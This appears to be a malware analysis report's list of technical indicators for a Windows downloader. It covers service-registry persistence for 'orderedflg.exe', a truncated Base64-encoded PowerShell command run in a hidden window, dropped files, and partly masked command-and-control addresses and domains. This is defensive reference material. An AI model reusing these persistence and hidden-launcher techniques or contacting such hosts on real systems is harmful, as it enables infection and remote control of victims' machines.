Technical information
- [<HKLM>\System\CurrentControlSet\Services\orderedflg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\orderedflg] 'ImagePath' = '"%WINDIR%\SysWOW64\orderedflg.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...
- %HOMEPATH%\894.exe
- %HOMEPATH%\894.exe to %WINDIR%\syswow64\orderedflg.exe
- '19#.#6.118.15':443
- http://ks.#d.ua/wp-includes/KXdkADm/
- http://19#.##.118.15:443/health/acquire/ringin/
- DNS ASK li###more.tk
- DNS ASK ig###istics.in
- DNS ASK su####roshomes.com
- DNS ASK ks.#d.ua
- '%HOMEPATH%\894.exe'
- '%WINDIR%\syswow64\orderedflg.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...' (with a hidden window)